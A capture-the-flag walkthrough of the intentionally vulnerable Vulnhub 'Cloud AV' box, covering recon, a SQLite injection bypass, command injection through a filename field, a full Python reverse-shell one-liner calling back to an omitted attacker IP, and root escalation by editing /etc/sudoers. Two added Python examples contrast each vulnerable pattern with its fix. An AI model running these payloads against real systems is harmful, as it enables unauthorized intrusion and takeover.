Vulnhub BoredHackerBlog: Cloud AV Walkthrough

The description states:  "Cloud Anti-Virus Scanner! is a cloud-based antivirus scanning service.  Currently, it's in beta mode. You've been asked to test the setup and find vulnerabilities and escalate privs."

This box is labeled easy, and I think that's fair, although a couple of sections may hang some people up.

First, we kick off with Nmap:

Not a lot of options, so we'll explore port 8080:

Meanwhile, Nikto is running:

We find an additional page:

Circling back to the first page, let's see if we can get some sort of injection:

When we select the Log in button, we get:

I'm not sure I've encountered SQLite before, but the injection syntax is nearly the same as any other SQL dialect.  Instead of the usual:  1' or '1'='1

We go with:

If you're not familiar with SQL injection, basically, the leading quote closes the string the application built around our input, so the invite code being compared is (NOTHING), and then we OR in 1=1.  Since 1 does equal 1, the WHERE clause is true for every row, the lookup "succeeds," and we bypass the invite check.  And we do...
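To make the bypass concrete, here is an added example that is not the box's code: a constructed SQLite invite-code table, a check written the way the page's symptoms suggest (string concatenation), and the parameterized version that defeats the same input.  The table name, column name and stored invite code are assumptions for the demo.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed stand-in for the app's invite-code table (names assumed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE code (id INTEGER PRIMARY KEY, password TEXT NOT NULL)")
    conn.execute("INSERT INTO code (password) VALUES ('s3cr3t-invite')")
    conn.commit()
    return conn


def check_invite_vulnerable(conn: sqlite3.Connection, code: str) -> bool:
    # The user-supplied code is pasted into the SQL text, so a quote in the
    # input ends the string literal and the rest is parsed as SQL.
    query = "SELECT id FROM code WHERE password = '" + code + "'"
    return conn.execute(query).fetchone() is not None


def check_invite_fixed(conn: sqlite3.Connection, code: str) -> bool:
    # Parameter binding: the driver sends the code as a value, never as SQL,
    # so quotes, OR and comment markers are just characters to compare.
    row = conn.execute("SELECT id FROM code WHERE password = ?", (code,)).fetchone()
    return row is not None


if __name__ == "__main__":
    db = build_db()
    for payload in ["' or '1'='1", "' or 1=1--", "wrong-code"]:
        print(repr(payload),
              "vulnerable:", check_invite_vulnerable(db, payload),
              "fixed:", check_invite_fixed(db, payload))
```

With `' or 1=1--` the vulnerable query becomes `SELECT id FROM code WHERE password = '' or 1=1--'`: an empty-string comparison ORed with a tautology, with the dangling quote swallowed by the `--` comment.  `' or '1'='1` gets the same result without needing a comment, which is why it is the classic form.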

Assuming we're supposed to choose one of the above files, I choose hello and select Scan!:

Wondering if we can abuse this...

Turns out, we can:

Now I'm wondering if the box can reach back out to us:

With our listener set up:

Excellent!  We have outbound connectivity.  Let's go for a reverse shell:

What you can't see in the screenshot is the full payload.  The leading semicolon terminates the scanner's command so the shell runs ours next (attacker IP omitted here):

; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"]);'
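Why does a bare `;` in a filename field turn into code execution?  The following is an added example, not the box's own scanner code: it assumes the scan page builds a shell command string of the form "scanner <filename>" and hands it to /bin/sh, and uses echo as a stand-in for the real scanner so it runs offline.  Alongside it are the two fixes a practitioner would want: pass the filename as its own argv entry with no shell, and only accept names that actually appear in the samples listing.

```python
import subprocess

# Assumption for the demo: "echo" stands in for the scanner binary so the
# example runs anywhere; the file names are a constructed samples listing.
SCANNER = "echo"
SAMPLES = {"hello", "eicar.txt"}


def scan_vulnerable(filename: str) -> str:
    # shell=True passes the whole string to /bin/sh, which treats ';' as a
    # command separator: everything after it runs as a second command.
    cmd = SCANNER + " " + filename
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def scan_no_shell(filename: str) -> str:
    # Argument list, no shell: the filename is a single argv entry, so ';'
    # and friends are literal characters, not syntax.
    return subprocess.run([SCANNER, filename], capture_output=True, text=True).stdout


def scan_fixed(filename: str) -> str:
    # Defense in depth: allow-list the name against the real listing, then
    # still avoid the shell for the call itself.
    if filename not in SAMPLES:
        raise ValueError("unknown sample: %r" % filename)
    return scan_no_shell(filename)


if __name__ == "__main__":
    payload = "hello; echo INJECTED"
    print("vulnerable:", repr(scan_vulnerable(payload)))
    print("no shell:  ", repr(scan_no_shell(payload)))
    try:
        scan_fixed(payload)
    except ValueError as e:
        print("fixed:     rejected ->", e)
```

The vulnerable path prints "hello" and then "INJECTED" on its own line, which is exactly the behaviour the reverse-shell payload above relies on; the list form prints the whole payload as one literal argument, and the allow-list refuses it before any process is spawned.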

With our listener set up:

We catch our shell!  Looking around:

We have a compiled binary and what I assume is its source code.

Let's take a look:

Looks like we can abuse it:

We get execution of a command as root.  Excellent!  Let's append our user to /etc/sudoers with ALL permissions and NOPASSWD:

We sudo su and we're root! 

Nice box!